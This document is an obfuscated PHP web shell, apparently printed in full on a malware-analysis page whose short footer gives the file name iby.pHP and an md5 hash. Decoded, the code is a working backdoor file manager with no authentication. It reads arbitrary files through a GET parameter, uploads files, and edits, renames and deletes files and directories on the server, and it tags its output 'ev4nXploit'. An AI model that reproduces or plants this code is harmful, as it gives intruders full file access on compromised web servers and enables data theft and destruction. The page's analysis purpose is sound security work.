<?php goto YG8bt; qJncF: C1dT8: goto d17Wo; NN6Ob: goto e9Ajt; goto Zcy7G; MGAYU: echo "\74\x66\157\x6e\164\40\x63\x6f\154\x6f\x72\x3d\x22\x23\60\65\102\x36\64\x30\42\76\125\160\154\157\x61\x64\40\x4f\x4b\x21\x3c\57\x66\157\156\164\76\74\x62\x72\x2f\76"; goto HALNn; fedG4: C_3kl: goto WXN5q; tI2Xk: if ($_POST["\x6f\160\164"] == "\162\145\x6e\x61\155\145") { goto otuWQ; } goto N8TLU; PtNVN: echo "\x3c\146\157\162\155\x20\x6d\x65\x74\x68\x6f\144\75\42\120\117\123\124\x22\x3e\74\x74\x65\170\164\141\x72\145\141\x20\x77\162\x61\160\75\x22\157\146\x66\x22\40\143\157\x6c\163\75\61\x34\60\x20\162\157\167\x73\75\65\x30\x20\156\x61\x6d\x65\x3d\x22\163\x72\x63\x22\x3e" . htmlspecialchars(file_get_contents($_POST["\160\141\164\x68"])) . "\x3c\x2f\x74\x65\x78\164\x61\x72\x65\x61\76\74\142\162\40\x2f\76\x3c\151\156\160\x75\x74\40\164\171\160\x65\x3d\42\150\151\144\x64\x65\x6e\42\x20\156\x61\155\145\x3d\42\x70\x61\164\150\42\x20\166\141\x6c\165\145\x3d\42" . $_POST["\x70\x61\164\150"] . "\42\x3e\x3c\x69\x6e\x70\165\x74\x20\x74\x79\x70\x65\75\x22\150\151\144\x64\145\156\42\40\156\x61\155\x65\x3d\x22\x6f\160\x74\42\x20\166\141\154\165\x65\75\x22\145\144\151\x74\42\x3e\x3c\151\156\x70\x75\164\x20\164\171\x70\x65\75\x22\163\x75\142\155\151\164\x22\x20\x76\141\x6c\165\x65\x3d\42\107\157\42\40\57\76\x3c\x2f\x66\157\x72\155\x3e"; goto el7ld; xGtWj: echo "\x3c\57\146\157\156\x74\x3e\74\x2f\x74\x64\76\x3c\x2f\x68\x31\76\74\164\x64\40\x77\x69\144\x74\150\75\x22\x32\x37\x25\x22\76\15\xa\x3c\146\157\x72\x6d\x20\x65\x6e\x63\164\x79\x70\x65\x3d\x22\155\165\154\x74\x69\160\x61\162\x74\x2f\x66\157\x72\x6d\55\x64\141\x74\141\x22\x20\155\145\x74\x68\157\x64\75\x22\120\x4f\123\x54\x22\x3e\15\xa\x9\x3c\x69\156\x70\x75\164\x20\164\171\x70\145\75\42\146\x69\x6c\145\x22\x20\156\141\x6d\x65\x3d\42\146\x69\x6c\x65\42\57\x3e\15\xa\11\74\151\156\160\x75\164\x20\164\171\160\x65\x3d\42\x73\165\142\x6d\151\164\x22\x20\166\141\x6c\165\x65\75\x22\x55\160\x6c\157\x61\x64\42\40\x2f\x3e\15\xa\74\57\x66\x6f\x72\155\76\xd\xa\74\x2f\x74\x64\76\74\57\x74\x72\76\74\x74\162\76\x3c\x74\144\x20\143\157\x6c\163\x70\141\x6e\75\x22\62\x22\x3e"; goto GL0pd; HL3p0: ycf4o: goto jSesb; wFr3x: ''; goto ePUSl; g975q: otuWQ: goto afafl; HALNn: MKjN2: goto qJncF; xPoI1: echo "\15\12\74\41\x44\117\x43\124\x59\120\105\x20\150\x74\155\154\76\x3c\x68\164\x6d\154\76\15\12\x3c\150\x65\141\x64\x3e\xd\12\74\164\x69\x74\x6c\145\76\x69\x6e\144\x65\x78\x20\157\x66\x20" . getcwd() . "\x3c\x2f\164\151\164\154\x65\x3e\xd\12\74\163\x74\x79\154\x65\x3e\15\12\x61\x7b\xd\12\x63\157\x6c\157\162\x3a\x62\154\141\x63\153\73\xd\12\x74\145\x78\x74\55\x64\x65\143\x6f\162\x61\x74\151\x6f\x6e\x3a\40\156\x6f\156\x65\73\xd\12\x7d\xd\12\x61\x3a\150\157\x76\145\162\173\15\12\x63\x6f\x6c\x6f\x72\72\40\x77\150\151\x74\x65\73\xd\xa\x74\145\170\164\x2d\163\150\x61\x64\x6f\167\x3a\x30\160\170\x20\60\x70\170\x20\x36\x70\170\x20\x23\60\x30\x30\x3b\15\xa\175\15\xa\xd\12\74\x2f\x73\164\171\154\x65\76\15\xa\x3c\57\150\x65\x61\x64\76\74\142\x6f\x64\x79\76\40"; goto W_cmL; Cx_y0: goto C_3kl; goto ScKiN; kfk2I: goto ycf4o; goto zOqoO; YG8bt: set_time_limit(0); goto r371j; FlAQo: goto d7HoN; goto g975q; TPkFm: goto zlZ2R; goto kEzLn; ocRLS: goto g1jtp; goto hmaSy; V1e5y: echo "\74\x66\157\x6e\164\40\x63\x6f\x6c\157\x72\75\42\43\x30\x35\102\x36\64\x30\42\76\x45\144\151\x74\x20\106\151\154\145\x20\117\113\x21\74\x2f\x66\x6f\156\x74\76\74\142\x72\x20\x2f\76"; goto Xz2jP; TESqP: echo "\x3c\146\157\x6e\164\x20\x63\x6f\x6c\157\162\75\x22\x77\150\x69\x74\145\x22\x3e\105\144\x69\x74\x20\106\151\154\145\x20\x46\x61\x69\x6c\145\x64\x21\74\57\x66\157\156\x74\76\x3c\x62\162\40\x2f\x3e"; goto ZKpHR; TmduH: if (rmdir($_POST["\x70\141\x74\x68"])) { goto L3ogU; } goto tOXtN; gynq9: if (unlink($_POST["\160\x61\x74\150"])) { goto DgCne; } goto CM41t; ZKpHR: goto RPKW9; goto AENSa; ZH1Va: echo "\x3c\146\157\162\155\40\x6d\145\x74\x68\157\x64\x3d\42\x50\x4f\123\x54\42\x3e\116\145\x77\40\x4e\x61\155\145\40\x3a\40\74\151\x6e\160\165\x74\x20\156\x61\155\145\x3d\x22\156\145\x77\156\141\155\145\x22\x20\x74\x79\160\145\x3d\x22\x74\x65\170\164\42\x20\x73\x69\x7a\145\75\42\62\60\42\40\166\141\x6c\x75\145\75\42" . $_POST["\156\141\x6d\x65"] . "\x22\x20\x2f\76\74\151\156\x70\165\x74\40\x74\171\160\x65\75\x22\x68\151\x64\x64\145\156\x22\40\156\x61\155\145\x3d\42\160\x61\x74\x68\x22\x20\x76\141\154\165\145\75\x22" . $_POST["\x70\141\x74\x68"] . "\x22\76\x3c\x69\x6e\x70\165\x74\x20\x74\171\x70\145\75\42\150\151\144\x64\145\x6e\42\x20\x6e\x61\x6d\145\75\x22\x6f\x70\x74\42\x20\x76\141\x6c\x75\145\75\42\x72\x65\156\x61\155\x65\x22\76\74\151\156\160\165\x74\40\x74\x79\x70\145\75\x22\163\165\x62\155\151\x74\42\40\x76\x61\154\x75\x65\75\42\107\x6f\x22\40\57\76\x3c\57\146\157\x72\155\76"; goto wKl2P; rmB4d: XEr1g: goto TTCik; chkZX: echo "\x3c\164\x65\x78\164\x61\162\145\141\40\x77\x72\141\160\75\x6f\x66\x66\x20\x63\x6f\154\x73\75\61\x34\60\x20\x72\157\x77\x73\x3d\65\60\40\162\x65\x61\144\x6f\x6e\154\x79\75\x27\x27\76" . htmlspecialchars(file_get_contents($_GET["\146\x69\x6c\145\x73\x72\x63"])) . "\x3c\x2f\x74\145\x78\x74\141\x72\x65\x61\x3e"; goto ocRLS; QBGlk: vWKl2: goto gynq9; jSesb: e9Ajt: goto nSdoJ; d17Wo: if (isset($_GET["\x66\151\x6c\145\x73\162\x63"])) { goto XEr1g; } goto c3yc2; EqMtv: fclose($ctqDJ); goto ZunQc; mtooO: echo "\x3c\164\x72\76\74\x74\150\x20\143\x6f\154\x73\160\141\156\x3d\42\x35\42\x3e\x3c\150\x72\x3e\x3c\x2f\x74\150\76\74\57\164\x72\x3e\74\57\x74\x61\142\154\145\x3e\74\150\x34\x3e\74\143\x6f\x64\145\x3e" . php_uname() . "\x20\x7c\40\145\166\x34\x6e\x58\x70\x6c\157\151\164\74\x2f\150\x34\76\74\x2f\x63\x6f\x64\x65\76"; goto KlQYi; Sn925: qX7kJ: goto aj12w; fR05h: echo "\74\144\x69\166\x3e\xd\12\x3c\164\141\x62\154\x65\40\x62\x6f\162\x64\145\x72\75\x22\60\x22\40\x63\x65\154\154\160\x61\x64\x64\151\x6e\x67\75\x22\63\x22\x20\143\x65\x6c\x6c\163\160\141\143\151\x6e\x67\x3d\x22\61\42\40\141\x6c\151\x67\156\x3d\42\42\x3e\15\12\74\x74\162\76\xd\12\x3c\x74\x68\76\x4e\141\155\145\x3c\x2f\x74\x68\76\15\xa\x3c\x74\150\76\x4c\141\x73\x74\x20\x6d\x6f\x64\x69\x66\x69\x65\144\x3c\57\164\150\76\xd\xa\74\164\x68\x3e\120\x65\x72\x6d\151\163\163\x69\x6f\156\x73\x3c\x2f\x74\150\76\15\xa\74\x74\150\x3e\123\x69\172\x65\x3c\57\164\150\x3e\xd\12\74\x74\x68\76\x4f\160\164\151\157\x6e\163\74\57\x74\x68\x3e\15\12\x3c\164\162\76\74\x74\x68\40\x63\x6f\154\x73\x70\141\156\75\42\65\42\76\x3c\x68\162\x3e\74\57\164\x68\76\74\x2f\164\162\76\xd\xa\74\57\164\x72\x3e"; goto oB4tq; AaIq0: if (!isset($_POST["\163\162\x63"])) { goto jO7hG; } goto bnX5l; Zl_P3: echo ''; goto eXV_n; zOqoO: DgCne: goto SsWWu; Y539P: zlZ2R: goto Yr0xz; Xz2jP: RPKW9: goto EqMtv; Jdseq: yt2cG: goto xGtWj; afafl: if (!isset($_POST["\x6e\145\167\156\141\x6d\x65"])) { goto IoaCJ; } goto t100E; WL21b: $N_N_d = getcwd(); goto TPkFm; tOKYN: echo ''; goto RXMyP; GL0pd: if (!isset($_FILES["\x66\x69\154\x65"])) { goto C1dT8; } goto Rq_3j; MTHT2: echo "\x3c\x66\x6f\156\164\40\x63\157\154\x6f\x72\75\42\167\x68\151\x74\x65\x22\x3e\x52\x65\156\x61\155\x65\x20\x46\x61\151\x6c\145\x64\41\74\57\146\x6f\156\164\76\x3c\142\x72\40\x2f\x3e"; goto TXVS_; GTPZK: LW03u: goto mtooO; xdJwG: DgHAy: goto ZZELL; ez2lI: CsHLk: goto bRBt3; mz5AW: foreach ($xVxO3 as $mV34m => $Z7H8K) { goto PlipJ; kVOJA: aYJwo: goto ufqlq; gfbhl: if (!($rEHna != $mV34m)) { goto Dd1T2; } goto DdeIc; OqeX9: goto KrTWs; goto kVOJA; crbyY: Dd1T2: goto N4QaE; N4QaE: MVQvs: goto sfAC5; HO1Dp: if (!($rEHna <= $mV34m)) { goto aYJwo; } goto WAWNT; DdeIc: echo "\57"; goto crbyY; WAWNT: echo $xVxO3[$rEHna]; goto gfbhl; UqpJd: zfTyr: goto ukuBB; PlipJ: echo "\x3c\x61\x20\150\x72\x65\146\75\47\77\160\x61\164\150\x3d"; goto DG9O8; DG9O8: $rEHna = 0; goto WmPKk; WmPKk: KrTWs: goto HO1Dp; sfAC5: $rEHna++; goto OqeX9; ufqlq: echo "\x27\x3e{$Z7H8K}\x3c\x2f\141\x3e\x2f"; goto UqpJd; ukuBB: } goto Jdseq; mcO2c: echo "\74\150\x31\76\74\141\x20\150\162\x65\146\x3d\x27\77\47\76\x69\156\144\x65\170\40\157\146\x20"; goto mz5AW; yahBj: if ($_POST["\x74\x79\160\x65"] == "\146\x69\x6c\145") { goto vWKl2; } goto NN6Ob; ySzgt: chdir($_GET["\x70\141\164\150"]); goto Y539P; aj12w: foreach ($Ti2jx as $fuEss) { goto mcUGK; NnUY0: ixUXe: goto gzTh3; lO9KR: poJts: goto x0KUt; aGLBN: echo "\74\x2f\164\x64\x3e\15\xa\x9\x3c\x74\x64\40\x61\x6c\151\x67\x6e\x3d\x63\145\x6e\x74\x65\162\x3e" . $oiJyR . ''; goto UmsqV; gzTh3: echo "\15\12\11\74\x74\162\x3e\xd\12\11\74\x74\x64\76\x3c\x69\x6d\x67\x20\163\x72\x63\75\x27\150\x74\x74\x70\163\72\57\57\167\167\x77\x2e\x65\x2d\x67\x65\x74\56\x63\157\155\x2e\x74\x77\x2f\x69\143\157\x6e\163\57\164\x65\x78\x74\56\x67\x69\146\x27\x3e\40\74\141\40\150\162\145\x66\x3d\x22\77\146\151\x6c\x65\x73\162\143\x3d{$N_N_d}\x2f{$fuEss}\46\160\x61\x74\150\x3d{$N_N_d}\42\x3e{$fuEss}\74\57\x61\76\x3c\x2f\164\x64\76\xd\xa\x9\x3c\x74\144\40\141\x6c\151\147\x6e\x3d\x63\145\156\164\145\162\76" . date("\x64\55\155\x2d\171\40\110\72\151", filemtime("{$N_N_d}\x2f{$fuEss}")) . "\74\x2f\164\144\76\15\xa\11\74\x74\144\40\x61\154\x69\x67\156\75\x63\x65\156\164\145\162\76"; goto VJfDZ; K35wW: FRUxV: goto J2Hin; F1AGE: $oiJyR = filesize("{$N_N_d}\57{$fuEss}") / 1024; goto rDVcU; phd6c: if ($oiJyR >= 1024) { goto SgNrs; } goto YllZR; hOTlo: SgNrs: goto osWtF; Voxkp: if (!(is_writable("{$N_N_d}\x2f{$fuEss}") || !is_readable("{$N_N_d}\x2f{$fuEss}"))) { goto XYe_Q; } goto Rr3Tx; YllZR: $oiJyR = $oiJyR . "\x20\x4b\102"; goto n_T0x; obQ3B: echo "\x3c\146\157\x6e\x74\x20\143\157\154\x6f\162\x3d\42\x23\60\x35\x42\66\64\60\x22\76"; goto XDVhH; n_T0x: goto ixUXe; goto hOTlo; Rr3Tx: echo "\x3c\x2f\146\x6f\x6e\164\x3e"; goto ktwr2; xFh9a: tiS41: goto obQ3B; h30e6: goto FRUxV; goto xFh9a; UmsqV: echo "\x3c\x2f\164\x64\x3e\15\xa\11\74\164\x64\x3e\15\12\11\x3c\146\157\162\155\40\155\x65\x74\x68\157\144\75\x22\120\117\x53\124\42\x20\x61\x63\x74\151\x6f\156\75\42\x3f\157\160\164\151\x6f\x6e\x26\x70\x61\164\150\75{$N_N_d}\x22\76\15\xa\11\x3c\x73\145\x6c\145\143\x74\x20\156\141\x6d\145\75\x22\x6f\160\164\42\x3e\15\xa\x9\74\157\x70\x74\151\x6f\x6e\x20\166\x61\154\x75\145\75\x22\x22\76\163\145\x6c\x65\x63\x74\x3c\x2f\157\x70\164\151\157\x6e\x3e\xd\12\x9\74\x6f\160\164\151\157\x6e\40\166\x61\154\165\145\75\x22\144\145\154\x65\164\x65\x22\x3e\x44\145\x6c\x65\x74\145\x3c\x2f\157\160\x74\x69\157\x6e\76\xd\xa\11\x3c\x6f\160\164\151\157\156\x20\166\141\154\165\x65\75\42\x72\145\156\141\155\x65\42\x3e\122\x65\x6e\x61\x6d\x65\74\x2f\x6f\160\164\151\157\x6e\x3e\15\12\x9\74\x6f\160\x74\x69\157\x6e\40\166\x61\x6c\165\145\x3d\x22\x65\144\151\164\x22\x3e\105\144\151\164\x3c\x2f\x6f\x70\164\151\157\x6e\x3e\x3c\x2f\163\x65\154\x65\143\164\76\x3c\151\156\x70\165\164\x20\164\x79\x70\145\75\x22\x68\x69\x64\x64\x65\x6e\x22\40\x6e\141\x6d\x65\x3d\42\164\x79\160\x65\x22\40\166\x61\154\x75\145\x3d\42\146\x69\154\x65\42\76\x3c\x69\156\x70\x75\x74\40\x74\171\x70\x65\75\42\150\151\x64\144\145\156\42\40\156\x61\x6d\145\75\x22\156\x61\155\145\42\40\166\141\154\x75\x65\x3d\x22{$fuEss}\42\x3e\74\151\156\160\165\x74\40\x74\x79\x70\145\x3d\x22\x68\x69\x64\x64\x65\x6e\42\40\x6e\141\155\145\x3d\42\160\141\x74\150\x22\x20\166\x61\154\165\145\x3d\42{$N_N_d}\57{$fuEss}\x22\76\x3c\151\156\160\165\x74\40\164\171\160\145\75\x22\163\165\x62\x6d\x69\164\x22\40\166\x61\x6c\165\145\75\42\x3e\x22\x20\x2f\x3e\74\57\x66\157\162\x6d\76\74\x2f\x74\144\x3e\x3c\57\x74\162\76"; goto lO9KR; rDVcU: $oiJyR = round($oiJyR, 3); goto phd6c; VJfDZ: if (is_writable("{$N_N_d}\x2f{$fuEss}")) { goto tiS41; } goto xJUky; XDVhH: goto FRUxV; goto yqUlH; vCKbH: echo "\x3c\x66\157\156\164\x20\143\157\154\157\162\75\x22\167\150\x69\x74\145\42\76"; goto K35wW; X0bEU: goto poJts; goto EsOQT; ktwr2: XYe_Q: goto aGLBN; mcUGK: if (is_file("{$N_N_d}\x2f{$fuEss}")) { goto xJ_J_; } goto X0bEU; xJUky: if (!is_readable("{$N_N_d}\x2f{$fuEss}")) { goto NDz5o; } goto h30e6; J2Hin: echo kOHCU("{$N_N_d}\57{$fuEss}"); goto Voxkp; osWtF: $oiJyR = round($oiJyR / 1024, 2) . "\x20\115\102"; goto NnUY0; EsOQT: xJ_J_: goto F1AGE; yqUlH: NDz5o: goto vCKbH; x0KUt: } goto GTPZK; AENSa: Ic0LA: goto V1e5y; c3yc2: if (isset($_GET["\157\160\164\151\157\156"]) && $_POST["\x6f\160\x74"] != "\144\145\x6c\x65\x74\145") { goto y2_Al; } goto cxCps; Rq_3j: if (copy($_FILES["\146\151\x6c\145"]["\x74\x6d\x70\137\156\x61\155\x65"], $N_N_d . "\57" . $_FILES["\x66\151\x6c\x65"]["\x6e\x61\155\x65"])) { goto wEKGG; } goto YScJR; YScJR: echo "\74\x66\x6f\156\164\x20\143\x6f\x6c\157\x72\x3d\x22\167\150\151\164\145\x22\76\125\160\154\x6f\141\144\40\106\141\151\154\x65\x64\x21\x3c\x2f\x66\157\x6e\164\x3e\x3c\x62\162\57\x3e"; goto XJz4P; uE8kI: echo "\74\x66\x6f\156\x74\x20\x63\x6f\154\x6f\162\75\42\x23\x30\x35\x42\66\64\60\42\x3e\x44\x69\162\40\x44\x65\154\145\x74\x65\x64\x21\x3c\x2f\x66\157\156\x74\x3e\74\x62\162\x20\57\76"; goto fedG4; Zcy7G: X3Vn2: goto TmduH; ePUSl: echo "\74\57\x74\x72\76\74\57\x74\x64\x3e\x3c\x2f\x74\141\x62\154\x65\x3e\x3c\x62\162\x20\x2f\76"; goto chkZX; wKl2P: goto d7HoN; goto t8rlg; Lzv9l: if ($_POST["\x74\x79\160\145"] == "\144\151\x72") { goto X3Vn2; } goto yahBj; oB4tq: foreach ($Ti2jx as $ljzHe) { goto JKyQy; PzvYx: goto kxoGo; goto JO7AO; r6wWl: echo "\x3c\x66\157\x6e\x74\40\143\157\x6c\x6f\162\75\x22\43\60\x35\102\66\64\x30\x22\x3e"; goto ta7lz; fYbMQ: if (!(is_writable("{$N_N_d}\57{$ljzHe}") || !is_readable("{$N_N_d}\57{$ljzHe}"))) { goto ZeBDQ; } goto pvvwp; clFl2: echo "\74\146\x6f\156\164\x20\143\x6f\x6c\157\x72\x3d\42\167\150\x69\x74\145\x22\76"; goto cujV0; qR7Sh: KUXmY: goto OcS1x; JKyQy: if (!(!is_dir("{$N_N_d}\x2f{$ljzHe}") || $ljzHe == "\56" || $ljzHe == "\x2e\56")) { goto gu_JU; } goto Co5bJ; XtAVR: echo "\74\x2f\164\144\x3e\74\x74\x64\40\141\154\151\x67\156\x3d\x63\x65\x6e\x74\145\162\76\55\55"; goto Nuhm6; YFTg1: if (!is_readable("{$N_N_d}\x2f{$ljzHe}")) { goto rRKrZ; } goto PzvYx; cujV0: kxoGo: goto qi4ET; qi4ET: echo KoHcU("{$N_N_d}\x2f{$ljzHe}"); goto fYbMQ; obyh8: rRKrZ: goto clFl2; VfpNJ: if (is_writable("{$N_N_d}\57{$ljzHe}")) { goto fk7W_; } goto YFTg1; FJygb: echo "\xd\12\11\x3c\164\x72\76\15\12\11\74\164\144\x3e\x3c\x69\155\147\40\x73\x72\143\x3d\x27\x68\164\x74\x70\163\72\x2f\x2f\167\167\x77\56\x65\55\x67\145\164\x2e\143\x6f\155\x2e\x74\167\57\151\143\x6f\x6e\163\57\146\157\154\x64\x65\162\56\x67\x69\146\x27\x3e\40\74\141\x20\150\x72\145\146\75\42\x3f\160\141\164\150\x3d{$N_N_d}\57{$ljzHe}\x22\x3e{$ljzHe}\74\57\x61\76\x3c\57\164\144\x3e\74\164\x64\40\141\154\151\x67\x6e\75\143\x65\x6e\x74\145\162\x3e" . date("\144\x2d\155\x2d\x79\40\x48\72\x69", filemtime("{$N_N_d}\x2f{$fuEss}")) . "\x3c\x2f\164\144\76\x3c\164\144\x20\141\x6c\x69\147\x6e\75\143\145\x6e\x74\x65\x72\76"; goto VfpNJ; ODYzQ: gu_JU: goto FJygb; Nuhm6: echo "\x3c\x2f\164\144\76\xd\12\x9\x3c\x74\144\76\74\x66\157\162\155\x20\x6d\x65\x74\150\157\144\75\42\120\x4f\123\x54\x22\x20\141\143\164\x69\157\x6e\x3d\x22\x3f\157\160\164\151\x6f\156\x26\x70\141\x74\150\75{$N_N_d}\42\76\xd\12\11\x3c\163\145\154\x65\x63\164\x20\156\x61\x6d\x65\x3d\42\x6f\160\x74\x22\76\15\xa\x9\74\x6f\160\164\151\157\x6e\x20\x76\141\154\165\145\75\x22\42\x3e\x73\x65\x6c\145\x63\x74\x3c\x2f\157\x70\x74\x69\157\x6e\x3e\xd\12\11\74\x6f\x70\x74\151\157\x6e\40\x76\141\x6c\165\x65\75\42\144\x65\154\145\x74\x65\42\x3e\104\145\x6c\145\164\145\x3c\57\x6f\x70\164\x69\157\x6e\x3e\15\xa\x9\74\x6f\160\164\151\x6f\156\x20\166\x61\x6c\x75\145\x3d\x22\x72\x65\x6e\141\x6d\x65\42\x3e\122\145\x6e\x61\155\x65\74\57\157\160\164\x69\157\x6e\76\15\xa\11\74\57\163\x65\154\x65\x63\164\76\15\12\11\74\x69\x6e\160\x75\164\40\164\x79\160\145\75\x22\x68\x69\144\144\x65\156\42\40\156\x61\155\145\x3d\x22\x74\x79\160\145\42\40\166\141\154\165\145\75\x22\144\x69\162\42\x3e\15\12\x9\x3c\151\x6e\160\x75\x74\x20\164\x79\x70\x65\x3d\42\150\151\x64\x64\145\x6e\42\40\156\x61\x6d\145\x3d\42\x6e\x61\x6d\x65\42\x20\x76\141\x6c\x75\x65\75\42{$ljzHe}\x22\76\xd\xa\x9\74\151\156\x70\165\164\x20\x74\x79\x70\x65\x3d\x22\x68\151\x64\144\145\x6e\42\40\x6e\141\155\145\75\42\160\x61\x74\x68\42\x20\x76\x61\154\165\145\x3d\x22{$N_N_d}\57{$ljzHe}\42\76\xd\12\11\74\x69\x6e\x70\165\164\40\x74\x79\x70\145\75\x22\x73\165\x62\x6d\x69\164\42\x20\x76\x61\154\x75\x65\75\x22\x3e\x22\40\57\x3e\x3c\x2f\146\157\x72\x6d\x3e\x3c\57\x74\144\76\74\x2f\x74\162\x3e"; goto qR7Sh; gSC6V: ZeBDQ: goto XtAVR; Co5bJ: goto KUXmY; goto ODYzQ; pvvwp: echo "\74\x2f\x66\157\x6e\164\x3e"; goto gSC6V; ta7lz: goto kxoGo; goto obyh8; JO7AO: fk7W_: goto r6wWl; OcS1x: } goto Sn925; BAkG4: $N_N_d = $_GET["\x70\141\164\150"]; goto ySzgt; eXV_n: g1jtp: goto tQjmw; bRBt3: echo "\x3c\146\x6f\156\x74\40\143\157\154\157\x72\x3d\42\43\60\x35\102\x36\x34\60\42\76\x52\x65\156\141\155\145\40\117\113\41\74\x2f\x66\157\x6e\x74\76\x3c\x62\162\40\x2f\x3e"; goto xdJwG; tQjmw: echo "\x3c\x2f\x62\157\144\171\x3e\74\x2f\150\x74\x6d\154\x3e"; goto ME8Nj; cr0P6: wEKGG: goto MGAYU; W_cmL: if (isset($_GET["\160\x61\164\150"])) { goto zr33w; } goto WL21b; bnX5l: $ctqDJ = fopen($_POST["\x70\x61\164\150"], "\167"); goto TrRBW; OVSaB: if (!(isset($_GET["\157\x70\x74\x69\x6f\x6e"]) && $_POST["\x6f\x70\x74"] == "\x64\x65\154\145\164\145")) { goto i9Z9s; } goto Lzv9l; N8TLU: if ($_POST["\157\x70\x74"] == "\x65\x64\x69\x74") { goto CppH9; } goto FlAQo; hmaSy: y2_Al: goto Xixyi; Yr0xz: $N_N_d = str_replace("\134", "\x2f", $N_N_d); goto hyhlZ; Lgep3: IoaCJ: goto ZH1Va; TXVS_: goto DgHAy; goto ez2lI; hyhlZ: $xVxO3 = explode("\57", $N_N_d); goto mcO2c; t8rlg: CppH9: goto AaIq0; SsWWu: echo "\x3c\146\157\x6e\164\40\143\157\154\x6f\x72\x3d\42\x23\x30\x35\x42\x36\64\60\x22\76\x44\145\x6c\145\164\145\40\x46\151\154\x65\x20\104\x6f\x6e\145\x21\x3c\x2f\x66\x6f\x6e\164\x3e\x3c\142\x72\40\57\76"; goto HL3p0; WXN5q: goto e9Ajt; goto QBGlk; kEzLn: zr33w: goto BAkG4; Xixyi: echo "\74\57\164\141\x62\x6c\145\76\74\142\162\40\x2f\76" . $_POST["\x70\x61\x74\x68"] . "\x3c\x62\x72\x20\57\x3e\74\x62\x72\x20\x2f\76"; goto tI2Xk; nSdoJ: i9Z9s: goto tOKYN; TrRBW: if (fwrite($ctqDJ, $_POST["\163\162\143"])) { goto Ic0LA; } goto TESqP; RXMyP: $Ti2jx = scandir($N_N_d); goto fR05h; r371j: error_reporting(0); goto xPoI1; cxCps: echo "\x3c\x2f\164\141\142\154\145\76\74\142\x72\40\57\76"; goto OVSaB; ZZELL: $_POST["\156\x61\155\x65"] = $_POST["\156\x65\x77\x6e\x61\155\x65"]; goto Lgep3; ZunQc: jO7hG: goto PtNVN; ScKiN: L3ogU: goto uE8kI; CM41t: echo "\x3c\146\157\156\x74\40\143\157\x6c\x6f\162\75\x22\x77\150\151\164\x65\x22\76\x44\x65\154\x65\x74\145\x20\x46\x69\154\x65\x20\x45\x72\162\x6f\162\x21\74\x2f\x66\157\x6e\x74\76\74\142\x72\40\x2f\x3e"; goto kfk2I; t100E: if (rename($_POST["\x70\141\164\x68"], $N_N_d . "\57" . $_POST["\x6e\145\167\156\x61\x6d\x65"])) { goto CsHLk; } goto MTHT2; tOXtN: echo "\x3c\x66\x6f\x6e\x74\x20\143\x6f\154\157\162\75\42\x77\150\x69\x74\x65\42\76\x44\145\x6c\145\164\x65\x20\104\151\162\x20\106\x61\151\x6c\145\x64\x21\74\57\146\x6f\156\164\76\x3c\x62\162\x20\57\76"; goto Cx_y0; el7ld: d7HoN: goto Zl_P3; TTCik: echo "\x3c\x74\141\142\154\145\x20\x77\x69\144\164\x68\x3d\42\61\60\x30\x25\42\x20\x62\x6f\162\144\x65\x72\75\x22\x30\x22\x20\143\145\154\154\x70\x61\144\x64\151\x6e\x67\x3d\42\x33\x22\x20\143\145\x6c\154\163\160\x61\x63\x69\x6e\x67\75\x22\61\42\x20\x61\x6c\x69\x67\x6e\x3d\x22\42\76\x3c\x74\x72\x3e\74\x74\x64\x3e\106\151\x6c\x65\x3a\40"; goto Khl29; KlQYi: goto g1jtp; goto rmB4d; Khl29: echo '' . $N_N_d . "\57" . basename($_GET["\x66\x69\x6c\x65\x73\x72\143"]); goto wFr3x; XJz4P: goto MKjN2; goto cr0P6; ME8Nj: function koHcU($fuEss) { goto CaQzk; KvADi: pEH_l: goto xz0E3; UpGPw: $rLXSy .= $pJe0L & 0x80 ? "\x77" : "\55"; goto Zt7L3; lfJTK: goto cD7xG; goto VRNHa; BaqrJ: goto cD7xG; goto MgIbE; pXV4L: HJq3K: goto WsEXN; xz0E3: $rLXSy = "\x70"; goto GgaRh; W8yIW: GTtJi: goto mOE7g; P3urD: goto cD7xG; goto pXV4L; GgaRh: cD7xG: goto NF12T; Zt7L3: $rLXSy .= $pJe0L & 0x40 ? $pJe0L & 0x800 ? "\163" : "\x78" : ($pJe0L & 0x800 ? "\123" : "\x2d"); goto vRVAM; KgngW: return $rLXSy; goto N9b7G; JSgCk: d9itH: goto oly53; yCQEe: $rLXSy .= $pJe0L & 0x8 ? $pJe0L & 0x400 ? "\163" : "\170" : ($pJe0L & 0x400 ? "\x53" : "\55"); goto wCijo; DZdf0: if (($pJe0L & 0x8000) == 0x8000) { goto GTtJi; } goto lz42z; MiUS8: $rLXSy = "\144"; goto CjW92; NF12T: $rLXSy .= $pJe0L & 0x100 ? "\x72" : "\55"; goto UpGPw; dvw95: goto cD7xG; goto W8yIW; CaQzk: $pJe0L = fileperms($fuEss); goto LWmMP; vRVAM: $rLXSy .= $pJe0L & 0x20 ? "\x72" : "\x2d"; goto PBqtq; wCijo: $rLXSy .= $pJe0L & 0x4 ? "\162" : "\x2d"; goto msj5P; ROZVE: if (($pJe0L & 0x1000) == 0x1000) { goto pEH_l; } goto k4seA; lz42z: if (($pJe0L & 0x6000) == 0x6000) { goto Y_hpn; } goto c4tPa; PBqtq: $rLXSy .= $pJe0L & 0x10 ? "\x77" : "\x2d"; goto yCQEe; k4seA: $rLXSy = "\x75"; goto P3urD; FHp93: if (($pJe0L & 0x2000) == 0x2000) { goto d9itH; } goto ROZVE; CGEkR: goto cD7xG; goto OXc0P; MgIbE: wjQh6: goto rHRnL; CjW92: goto cD7xG; goto JSgCk; LWmMP: if (($pJe0L & 0xc000) == 0xc000) { goto HJq3K; } goto rPHPl; WsEXN: $rLXSy = "\x73"; goto BaqrJ; oly53: $rLXSy = "\x63"; goto wBs21; wBs21: goto cD7xG; goto KvADi; rHRnL: $rLXSy = "\154"; goto dvw95; OXc0P: Y_hpn: goto tYI3L; c4tPa: if (($pJe0L & 0x4000) == 0x4000) { goto YWW4E; } goto FHp93; rPHPl: if (($pJe0L & 0xa000) == 0xa000) { goto wjQh6; } goto DZdf0; tYI3L: $rLXSy = "\142"; goto lfJTK; mOE7g: $rLXSy = "\55"; goto CGEkR; hUHn5: $rLXSy .= $pJe0L & 0x1 ? $pJe0L & 0x200 ? "\x74" : "\x78" : ($pJe0L & 0x200 ? "\x54" : "\x2d"); goto KgngW; msj5P: $rLXSy .= $pJe0L & 0x2 ? "\x77" : "\x2d"; goto hUHn5; VRNHa: YWW4E: goto MiUS8; N9b7G: }
PHP Malware Analysis

iby.pHP

md5: 9de25af1adaabd4b55b3cde8bbe37917

Screenshot

Attributes

Deobfuscated PHP code

Execution traces

Generated HTML code

Original PHP code
